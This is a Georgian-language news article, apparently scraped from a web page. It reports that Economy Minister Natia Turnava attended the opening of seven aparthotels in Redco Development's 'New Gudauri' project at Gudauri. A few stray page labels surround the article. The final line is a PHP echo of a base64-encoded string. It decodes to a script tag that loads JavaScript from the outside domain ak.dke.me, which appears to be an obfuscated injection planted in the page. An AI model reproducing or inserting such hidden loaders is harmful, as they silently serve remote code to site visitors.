celsiusi
ავერსი საქკაბელი
ეკონომიკისა და მდგრადი განვითარების მინისტრმა ნათია თურნავამ გუდაურში, კომპანია „რედკო დეველოპმენტის“ პროექტ „ახალი გუდაურის“ მორიგი ეტაპის გახსნის ცერემონიაში მიიღი მონაწილეობა.
 
პროექტის ამ ეტაპზე 7 აპარტოტელის მშენებლობა დასრულდა, რომლის ჯამური ინვესტიცია 85 მილიონი ლარია.
 
ნათია თურნავას თქმით, როდესაც ვსაუბრობთ ტურიზმის აღდგენაზე თუ ორნიშნა ეკონომიკურ ზრდაზე, ამ მიღწევებში აუცილებლად უნდა აღინიშნოს ისეთი მასშტაბური პროექტების ზეგავლენა, უდიდესი წვლილი და შენატანი, როგორიც გუდაურში, „რედკო დეველოპმენტის“ მიმდინარე პროექტია.
 
მისივე განცხადებით, „რედკოს“ მასშტაბური პროექტი ძალიან ღირებულია როგორც ტურიზმის აღდგენაში შეტანილი უდიდესი წვლილის, ასევე იმ თვალსაზრისითაც, რომ კოვიდ-პანდემიამ ვერ შეაფერხა განვითარების პროცესი.
 
„მიუხედავად კოვიდ-პანდემიისა, კომპანიამ დაასრულა სამუშაოები და შექმნა 150 მუდმივი სამუშაო ადგილი, სადაც დასაქმებულების უდიდესი უმრავლესობა ადგილობრივი მაცხოვრებლები არიან. ასევე აღსანიშნავია, რომ ამ აპარტოტელების ჩათვლით, უკვე 5000 ახალი ოთახია შექმნილი , 2025 წლის ბოლოსკენ კი, როდესაც პროექტის სრულად დასრულდება, ეს ციფრი გაორმაგდება და კომპლექსი მოიცავს 10 000 ნომერს, რომელიც უმასპინძლებს როგორც საერთაშორისო, ასევე ადგილობრივ ტურისტებს“ - აღნიშნა ნათია თურნავამ.
 
დეველოპერული კომპანია „რედკოს“ 7 ახალი აპარტოტელი - Neo, Alpic და 4 Seasons Gudauri თიბისის მხარდაჭერით გაიხსნა. ახალი აპარტოტელები პროექტის - „ახალი გუდაურის“ ნაწილია და პრემიუმ კლასის 852 აპარტამენტს აერთიანებს. ჯამური ინვესტიცია 85 მილიონ ლარს შეადგენს, პროექტ „ახალი გუდაურის“ საერთო ინვესტიცია კი 200 მილიონი ლარია.
863
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");